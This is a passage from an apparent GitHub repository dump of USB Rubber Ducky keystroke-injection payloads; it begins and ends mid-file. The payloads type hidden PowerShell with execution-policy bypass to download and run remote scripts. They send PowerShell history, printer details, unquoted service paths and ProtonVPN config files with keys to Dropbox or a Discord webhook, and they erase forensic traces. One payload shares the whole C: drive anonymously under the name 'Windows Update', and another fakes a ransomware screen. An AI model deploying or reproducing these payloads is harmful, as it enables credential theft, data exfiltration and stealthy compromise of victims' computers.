    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Powershell+History!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Powershell-History\n\nA payload to exfiltrate the history of the powershell console\n\n## Description\n\nThis payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Powershell-History/payload.txt",
    "content": "REM     Title: Powershell-History\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "RubberDucky/payloads/Printer-Recon/PR.ps1",
    "content": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alias(\"f\")]\n[string]$SourceFilePath\n) \n$DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\n$outputFile = Split-Path $SourceFilePath -leaf\n$TargetFilePath=\"/$outputFile\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $DropBoxAccessToken\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n}\n\nfunction Clean-Exfil { \n\n# empty temp folder\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# delete run box history\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Empty recycle bin\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n}\n\n$F1 = \"$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt\"\n\nGet-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1\n\nDropBox-Upload -f $F1\n\nClean-Exfil\n\n\n\n\n\n"
  },
  {
    "path": "RubberDucky/payloads/Printer-Recon/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Printer+Recon!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Printer-Recon\n\n## Description\n\nThis payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Printer-Recon/payload.txt",
    "content": "REM     Title: Printer-Recon\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network\r\n\r\nREM     Target: Windows 10\r\n\r\nDEFINE TARGET_URL example.com\r\n\r\n\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "RubberDucky/payloads/Priv-Paths/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Priv+Paths!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Priv-Paths\n\n## Description\n\nA payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.\n\n## Getting Started\n\n### Dependencies\n\n* Discord Webhook or other service that uses webhooks\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Command will be entered in the command prompt to search for unqouted service paths so you can later exploit them for priv esc\n```\nwmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v ^\"^\"^\" > p.txt\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Priv-Paths/payload.txt",
    "content": "REM     Title: Priv-Paths\r\nREM     Author: atomiczsec\r\nREM     Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.\r\nREM     Target: Windows 10\r\n\r\n\r\nREM Put your discord webook in this define variable, it has the name of \"d\" to minimize the typing time of the rubberducky\r\nDEFINE d YOUR-DISCORD-WEBHOOK\r\n\r\nDELAY 3000\r\nGUI r \r\nDELAY 1000\r\nSTRING cmd \r\nENTER\r\nDELAY 500\r\nSTRING cd %HOMEPATH%\r\nENTER\r\nDELAY 1000\r\nSTRING wmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v ^\"^\"^\" > p.txt\r\nENTER\r\nDELAY 1000\r\nSTRING curl.exe -F \"payload_json={\\\"username\\\": \\\"p\\\", \\\"content\\\": \\\"**Paths**\\\"}\" -F \"file=@p.txt\" d\r\nENTER\r\nDELAY 200\r\nSTRING del p.txt\r\nENTER\r\nDELAY 100\r\nSTRING exit\r\nENTER"
  },
  {
    "path": "RubberDucky/payloads/Proton-Hog/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Proton+Hog!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Proton-Hog\n\nA payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.\n\n## Description\n\nThis payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file\n\nThen dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Proton-Hog/payload.txt",
    "content": "REM     Title: Proton-Hog\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.\r\n\r\n\r\nREM     Target: Windows 10\r\n\r\nDEFINE TARGET_URL example.com\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "RubberDucky/payloads/Proton-Hog/s.ps1",
    "content": "function DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\n# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored\r\n\r\nif (-not(Test-Path \"$env:USERPROFILE\\AppData\\Local\\ProtonVPN\")) {\r\n     try {\r\n         Write-Host \"The VPN folder has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n\r\n  else {\r\n$protonVpnPath = \"$env:USERPROFILE\\AppData\\Local\\ProtonVPN\"\r\ncd $protonVpnPath\r\nGet-ChildItem | Where-Object {$_.name -Match \"ProtonVPN.exe\"} | cd\r\nGet-ChildItem | cd\r\n\r\n# Upload user.config to dropbox\r\nDropBox-Upload -f \"user.config\"\r\n} "
  },
  {
    "path": "RubberDucky/payloads/Pwn-Drive/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Pwn+Drive!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Pwn-Drive\n\nA payload to share the victims \"C:\" drive to the network.\n\n## Description\n\nThis payload will share the entire victims \"C:\" drive to the entire network for further exploitation.\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/Pwn-Drive/c.ps1",
    "content": "#Pwn-Drive\r\n\r\n#Enable Network Discovery\r\nnetsh advfirewall firewall set rule group=”network discovery” new enable=yes\r\n\r\n#Enable File and Print\r\nnetsh firewall set service type=fileandprint mode=enable profile=all\r\n\r\n#Setting Registry Values for allowing access to drive without credentials\r\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" -Name everyoneincludesanonymous -Value 1 -Force\r\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanManServer\\Parameters\\\" -Name restrictnullsessacces -Value 0 -Force\r\n\r\n#Sharing the Drive\r\nNew-SmbShare -Name \"Windows Update\" -Path \"C:\\\""
  },
  {
    "path": "RubberDucky/payloads/Pwn-Drive/payload.txt",
    "content": "REM     Title: Pwn-Drive\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload will share the entire victims \"C:\" drive to the entire network for further exploitation.\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "RubberDucky/payloads/RanFunWare/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=RanFunWare!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# RanFunWare\n\nA payload to prank your friends into thinking their computer got hit with ransomware.\n\n## Description\n\nThis payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "RubberDucky/payloads/RanFunWare/payload.txt",
    "content": "REM     Title: RanFunWare\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload will prank your target into thinking their machine got hit with ransomware.\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "RubberDucky/payloads/RanFunWare/r.ps1",
    "content": "#Hides Desktop Icons\r\n$Path=\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\"\r\nSet-ItemProperty -Path $Path -Name \"HideIcons\" -Value 1\r\nGet-Process \"explorer\"| Stop-Process\r\n\r\n#Changes Background  \r\n#URL For the Image of your choice (Wanna Cry Ransomware Background)\r\n$url = \"https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg\"\r\n\r\n\r\nInvoke-WebRequest $url -OutFile C:\\temp\\test.jpg\r\n\r\n\r\n$setwallpapersrc = @\"\r\nusing System.Runtime.InteropServices;\r\n\r\npublic class Wallpaper\r\n{\r\n  public const int SetDesktopWallpaper = 20;\r\n  public const int UpdateIniFile = 0x01;\r\n  public const int SendWinIniChange = 0x02;\r\n  [DllImport(\"user32.dll\", SetLastError = true, CharSet = CharSet.Auto)]\r\n  private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);\r\n  public static void SetWallpaper(string path)\r\n  {\r\n    SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);\r\n  }\r\n}\r\n\"@\r\nAdd-Type -TypeDefinition $setwallpapersrc\r\n\r\n[Wallpaper]::SetWallpaper(\"C:\\temp\\test.jpg\")\r\n\r\n\r\n#Pop Up Message\r\n\r\nfunction MsgBox {\r\n\r\n[CmdletBinding()]\r\nparam (\t\r\n[Parameter (Mandatory = $True)]\r\n[Alias(\"m\")]\r\n[string]$message,\r\n\r\n[Parameter (Mandatory = 